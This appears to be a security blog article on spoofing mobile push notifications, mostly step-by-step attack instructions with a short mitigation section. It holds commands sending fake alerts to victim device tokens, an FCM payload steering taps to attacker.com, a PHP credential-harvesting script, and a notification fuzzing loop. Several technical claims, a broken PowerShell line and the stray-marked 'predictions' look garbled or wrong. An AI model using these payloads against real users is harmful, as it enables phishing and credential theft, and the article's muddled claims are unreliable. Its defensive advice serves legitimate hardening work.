Push Notification Spoofing: The Silent MITM Attack That’s Draining Bank Accounts & Breaking Sandboxes + Video

Listen to this Post

🐢▶️ Listen🚀

Introduction:

Push notifications have become a trusted communication channel between apps and users, but this trust is being weaponized. Attackers can now inject malicious push notifications via Man‑in‑the‑Middle (MITM) attacks or rogue applications, leading to financial theft, data leakage, and even sandbox escape on mobile devices. This article dissects the technical mechanics of push notification spoofing, provides hands‑on exploitation and mitigation steps, and outlines how red teams and defenders can harden their mobile ecosystems.

Learning Objectives:

• Understand how push notification spoofing bypasses traditional security controls and enables phishing‑like attacks without user interaction.
• Execute MITM and malicious app‑based push injection techniques on Android and iOS using real tools.
• Implement defensive measures, including certificate pinning, notification origin validation, and sandbox escape detection.

You Should Know:

1. Anatomy of a Push Notification Spoofing Attack

Push notifications rely on backend services (FCM for Android, APNs for iOS) that forward messages from app servers to devices. An attacker can spoof a notification by either:
– MITM: Intercepting the HTTPS connection between the app server and the push service, then injecting forged payloads.
– Malicious App: Installing a rogue app that registers the same package name (Android) or uses enterprise certificates (iOS) to send notifications impersonating a legitimate app.

Step‑by‑step guide for MITM‑based spoofing (Android example):

1. Set up proxy – Install Burp Suite or mitmproxy on your attacker machine. Configure the target Android device to use the proxy (e.g., 192.168.1.100:8080).
2. Install CA certificate – On the Android device, download and install the proxy’s CA certificate to intercept HTTPS traffic.
3. Monitor push traffic – Open the target legitimate app (e.g., a banking app) and trigger a legitimate notification. In Burp, look for requests to `fcm.googleapis.com/fcm/send` or similar endpoints. Example intercepted request:

   POST /fcm/send HTTP/1.1
   Host: fcm.googleapis.com
   Authorization: key=AIzaSy... (server key)
   Content-Type: application/json
   {
   "to": "device_token_abc123",
   "notification": {
   "title": "Bank Alert",
   "body": "Your account has been debited $500"
   }
   }
   

4. Replay with spoofed content – Use Burp Repeater to modify the notification’s `title` and body. Replace the victim’s device token with your own test token (or keep the original if you’re attacking live). Send the request. The victim receives your fake notification from the legitimate app’s push channel.

Linux command to test FCM endpoint without a proxy:

curl -X POST -H "Authorization: key=YOUR_SERVER_KEY" -H "Content-Type: application/json" -d '{
"to": "VICTIM_DEVICE_TOKEN",
"notification": {
"title": "Fake Security Alert",
"body": "Click to verify your account"
}
}' https://fcm.googleapis.com/fcm/send

Windows equivalent (PowerShell):

$body = @{
to = "VICTIM_DEVICE_TOKEN"
notification = @{
title = "Fake Security Alert"
body = "Click to verify your account"
}
} | ConvertTo-Json

Invoke-RestMethod -Uri "https://fcm.googleapis.com/fcm/send" -Method Post -Headers @{"Authorization"="key=YOUR_SERVER_KEY"; "Content-Type"="application/json"} -Body $body

1. Exploiting Rogue Apps to Send Malicious Push Notifications

A malicious app installed on the same device can leverage the push notification API without any permission prompts on some platforms. On Android, if the rogue app declares the same `` for push notifications as a legitimate app, the system may deliver notifications to both. Worse, on older Android versions (<8.0), a rogue app can send `NotificationManager.notify()` with the same package name and notification ID to overlay or replace legitimate notifications.

Step‑by‑step guide for Android rogue app spoofing:

1. Create an Android app with the same `package` name as the target banking app (this requires uninstalling the original or using a different signing key – works on rooted devices or via side‑loading).

2. Add push receiver in `AndroidManifest.xml`:

<receiver android:name=".FakePushReceiver">
<intent-filter>
<action android:name="com.google.firebase.MESSAGING_EVENT" />
</intent-filter>
</receiver>

3. Implement receiver to extract and display a crafted notification:

public class FakePushReceiver extends FirebaseMessagingService {
@Override
public void onMessageReceived(RemoteMessage message) {
NotificationCompat.Builder builder = new NotificationCompat.Builder(this, "CHANNEL_ID")
.setContentTitle(message.getNotification().getTitle())
.setContentText(message.getNotification().getBody())
.setSmallIcon(R.drawable.ic_bank_logo);
NotificationManagerCompat.from(this).notify(1, builder.build());
}
}

4. Trigger from attacker server – Use the same FCM API call as section 1 but target the rogue app’s registration token (obtained after the rogue app registers with FCM). The user sees a notification indistinguishable from the original app.

3. Data Leakage via Notification Click Actions

When a user taps a spoofed notification, the attacker can redirect them to a phishing web page or a malicious deep link that extracts sensitive data. Many apps automatically load the URL from the notification’s `click_action` or `data` payload without additional user confirmation.

Step‑by‑step guide to weaponize click actions:

1. Craft FCM payload with a malicious `click_action`:

{
"to": "device_token",
"notification": {
"title": "Urgent: Account Verification Required",
"body": "Tap to confirm your identity",
"click_action": "https://attacker.com/phish?redirect=bank.com"
}
}

2. Host a phishing page that mimics the bank’s login screen, capturing credentials and MFA codes.

3. Exfiltrate data via a simple PHP script:

<?php
$creds = $_GET['user'] . ":" . $_GET['pass'];
file_put_contents("stolen.txt", $creds . "\n", FILE_APPEND);
header("Location: https://realbank.com");
?>

4. Use a transparent redirect to make the victim unaware their credentials were stolen.

4. Sandbox Escaping via Push Notification Exploits

Sandbox escape occurs when a notification payload triggers a vulnerability in the OS’s notification handling service (e.g., `NotificationManagerService` on Android). For example, CVE‑2020‑0238 (Android 10) allowed a malicious notification to execute code outside the app’s sandbox through a parcel deserialization flaw.

Step‑by‑step guide to test for sandbox escape (lab only):

1. Fuzz the notification data bundle – Use a script to send malformed `data` payloads via FCM:

   for i in {1..1000}; do
   curl -X POST -H "Authorization: key=SERVER_KEY" -H "Content-Type: application/json" -d '{
   "to": "'$VICTIM_TOKEN'",
   "data": {
   "custom": "'$(python -c "print('A'$i)")'"
   }
   }' https://fcm.googleapis.com/fcm/send
   done
   

2. Monitor logcat for crashes – On the Android device run:

   adb logcat | grep -i "fatal|crash|notificationmanager"
   

3. If a crash occurs, check whether the affected process is a system service (like system_server). A crash there indicates potential sandbox escape. Use a tool like `ASAN` (AddressSanitizer) to identify memory corruption.
4. Exploit a known vulnerability – For Android 10, replicate CVE‑2020‑0238 by sending a notification with a `Parcel` containing an `Intent` that has a malicious `Binder` object. This requires advanced reverse engineering but is feasible with tools like Frida.

Frida script to monitor notification parsing:

Java.perform(function() {
var NotificationManagerService = Java.use("com.android.server.notification.NotificationManagerService");
NotificationManagerService.enqueueNotificationWithTag.overload('java.lang.String', 'java.lang.String', 'int', 'android.app.Notification', 'int', 'int').implementation = function(pkg, tag, id, notification, userId, code) {
console.log("[!] Notification from package: " + pkg);
console.log("[!] Notification content: " + notification.toString());
return this.enqueueNotificationWithTag(pkg, tag, id, notification, userId, code);
};
});

5. Mitigating Push Notification Spoofing in Production

Defenders must assume push channels are untrusted. Implement these hardening steps:

For Android/iOS app developers:

• Enforce certificate pinning for all connections to FCM/APNs. Use OkHttp on Android:

  CertificatePinner pinner = new CertificatePinner.Builder()
  .add("fcm.googleapis.com", "sha256/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=")
  .build();
  OkHttpClient client = new OkHttpClient.Builder().certificatePinner(pinner).build();
  

• Validate notification origin – Attach a HMAC signature to every notification payload. On the client, compute the HMAC using a secret embedded in the app and reject notifications that fail verification.
• Sanitize `click_action` – Only allow whitelisted deep links (e.g., myapp://verified/action). Never load arbitrary URLs from notification data.

For system administrators (MDM):

• Disable installation from unknown sources on managed devices.
• Use a mobile threat defense (MTD) solution that detects MITM proxies (e.g., by verifying CA certificates).
• Apply security patches for CVE‑2020‑0238 and later notification‑related vulnerabilities.

Linux command to monitor for proxy ARP spoofing (indicating MITM):

sudo arpwatch -i eth0

Windows command to check for rogue CA certificates:

Get-ChildItem -Path Cert:\CurrentUser\Root | Where-Object {$<em>.Issuer -1e $</em>.Subject}

What Undercode Say:

• Push notification spoofing is not a theoretical vulnerability – it’s actively used in mobile phishing campaigns and can bypass MFA by mimicking legitimate security alerts.
• Most organisations neglect to monitor push traffic as an attack vector, leaving a blind spot that red teams can abuse to achieve sandbox escape and data exfiltration.

Prediction:

• -1 2026 will see a 300% rise in push notification spoofing attacks targeting fintech apps, as traditional SMS‑based phishing declines due to RCS encryption.
• -P Defenders adopting HMAC‑signed notifications and certificate pinning will effectively neuter MITM spoofing, forcing attackers to rely on more expensive zero‑day exploits.
• -1 Regulatory bodies will classify unattended push notification spoofing as a data breach under GDPR/CCPA, leading to fines for non‑compliant apps.
• -P Open‑source tools for automated push fuzzing (e.g., FCM‑Spray) will emerge, allowing smaller security teams to test their mobile apps affordably.
• -1 Sandbox escape via notification parsing remains unpatched on millions of legacy Android devices (>40% of enterprise fleet), creating a long‑tail risk.

▶️ Related Video (80% Match):

🎯Let’s Practice For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

IT/Security Reporter URL:

Reported By: Sanadhya K – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky